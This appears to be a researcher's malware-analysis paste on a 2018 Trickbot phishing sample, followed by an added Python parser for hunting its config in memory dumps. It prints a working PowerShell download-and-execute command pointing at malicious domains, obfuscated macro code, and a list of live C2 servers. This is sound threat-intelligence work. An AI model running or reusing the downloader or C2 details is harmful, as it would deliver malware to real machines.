Neonprimetime

2018-06-04 #Trickbot sample malware

Jun 4th, 2018
found by @neonprimetime security
#trickbot
same as this article https://myonlinesecurity.co.uk/yet-another-fake-companies-house-fw-company-complaint-3290749822-delivers-trickbot/
https://www.joesandbox.com/analysis/61724/0/html

Subject: FW: Company Complaint #xxxxxx
Attachment: xxxxxx.doc

507542d2ebb235941b3fbbb72f11950f
https://www.hybrid-analysis.com/sample/1fe32e3850e1ddd03e0415b2989d6f2751e276231d4bcded2c2d43f88057416c?environmentId=120

dropped
logo.exe
8CD3BA008C93327369B3D50341DB8F74
https://www.hybrid-analysis.com/sample/9d98f1ce5d7abb69a84d7224f44837f090f95d811c12d45173b529bf77bb3d9c?environmentId=100

------------
downloader commands run
------------
cmd.exe /c PowerShell "'PowerShell ""function Zupwjwbz1([String] $jdknrwstldt){(New-Object System.Net.WebClient).DownloadFile($jdknrwstldt,''%TEMP%\mlodfhqs_w.exe'');Start-Process ''%TEMP%\mlodfhqs_w.exe'';}try{Zupwjwbz1(''http://carasaan.com/logo.bin'')}catch{Zupwjwbz1(''http://tvboxaddons.com/logo.bin'')}'"" | Out-File -encoding ASCII -FilePath %TEMP%\Sg_ho1.bat;Start-Process '%TEMP%\Sg_ho1.bat' -WindowStyle Hidden"

------------
interesting macro code
------------
Function henderss()
henderss = wwwpasswd.yb121212
End Function

Function tester198()
tester198 = wwwpasswd.chewlang
End Function

Sub oodwin1234(kimpickle)
tataskelt = "Run"
embrocate = 0
azinepli = True
diecasts = 52 - 72
CallByName kimpickle, tataskelt, VbMethod, vogotave.ympmeoha, embrocate, azinepli
diecasts = 91 - 60 * diecast
diecasts = 70 + 6
diecasts = 3 + 72 - diecasts - 73 - diecast
End Sub


--------------------
interesting in memory strings
--------------------
0x2e208c (1736): <mcconf><ver>1000200</ver><gtag>ser0530</gtag><servs><srv>109.86.227.152:443</srv><srv>185.129.78.167:443</srv><srv>190.4.189.129:443</srv><srv>103.228.142.14:443</srv><srv>65.30.201.40:443</srv><srv>66.232.212.59:443</srv><srv>80.53.57.146:443</srv><srv>208.75.117.70:449</srv><srv>92.55.251.211:449</srv><srv>94.112.52.197:449</srv><srv>209.121.142.202:449</srv><srv>5.102.177.205:449</srv><srv>209.121.142.214:449</srv><srv>95.161.180.42:449</srv><srv>185.42.192.194:449</srv><srv>107.144.49.162:443</srv><srv>46.72.175.17:449</srv><srv>144.48.51.8:443</srv><srv>46.243.179.212:449</srv><srv>82.146.59.174:443</srv><srv>82.146.58.44:443</srv><srv>82.146.42.89:443</srv><srv>82.202.221.207:443</srv><srv>185.146.156.38:443</srv><srv>195.161.114.57:443</srv></servs><autorun><module name="systeminfo" ctl="GetSystemInfo"/><module name="injectDll"/></autorun></mcconf>
0x2f3ba0 (26): 208.75.117.70
0x2f4bb0 (91): https://208.75.117.70:449/ser0530/[REDACTED INFO]/5/spk/
0x40004d (29): !This is a PE executable
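Added example, not part of the paste: a small parser that carves a Trickbot <mcconf> block like the one above out of a memory dump, pulls the version, gtag, server list and autorun modules, and turns the servers into beacon URL prefixes of the shape seen in the in-memory URL (https://host:port/<gtag>/) for proxy-log hunting. The sample bytes are constructed and use documentation-range addresses, not this sample's real C2 list.

```python
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Locate Trickbot <mcconf> blobs anywhere inside an arbitrary memory dump.
MCCONF_RE = re.compile(rb"<mcconf>.*?</mcconf>", re.DOTALL)

@dataclass
class TrickbotConfig:
    version: str
    gtag: str
    servers: list  # (host, port) tuples from <servs><srv>host:port</srv>
    modules: list  # (name, ctl-or-None) tuples from <autorun><module .../>

def find_mcconf_blobs(memory: bytes) -> list:
    """Return every <mcconf>...</mcconf> byte string found in the dump."""
    return [m.group(0) for m in MCCONF_RE.finditer(memory)]

def parse_mcconf(blob: bytes) -> TrickbotConfig:
    """Parse one config blob into version, group tag, C2 list and autorun modules."""
    root = ET.fromstring(blob.decode("ascii", errors="replace"))
    if root.tag != "mcconf":
        raise ValueError("not an mcconf document")
    servers = []
    for srv in root.iterfind("servs/srv"):
        host, _, port = (srv.text or "").strip().rpartition(":")
        if host and port.isdigit():  # skip malformed entries instead of crashing
            servers.append((host, int(port)))
    modules = [(m.get("name", ""), m.get("ctl")) for m in root.iterfind("autorun/module")]
    return TrickbotConfig(root.findtext("ver", ""), root.findtext("gtag", ""), servers, modules)

def c2_url_prefixes(cfg: TrickbotConfig) -> list:
    """Beacon URL prefixes (https://host:port/<gtag>/) to search for in proxy logs."""
    return [f"https://{h}:{p}/{cfg.gtag}/" for h, p in cfg.servers]

# Constructed sample mimicking the memory-string layout on this page; hosts are from the
# RFC 5737 documentation range, not the sample's real C2 addresses.
SAMPLE_MEMORY = (
    b"\x00\x00junk\x00"
    b"<mcconf><ver>1000200</ver><gtag>ser0530</gtag><servs>"
    b"<srv>192.0.2.10:443</srv><srv>198.51.100.7:449</srv><srv>broken</srv></servs>"
    b'<autorun><module name="systeminfo" ctl="GetSystemInfo"/><module name="injectDll"/></autorun>'
    b"</mcconf>\x00more junk"
)

if __name__ == "__main__":
    for cfg in map(parse_mcconf, find_mcconf_blobs(SAMPLE_MEMORY)):
        print(cfg)
        print("\n".join(c2_url_prefixes(cfg)))
```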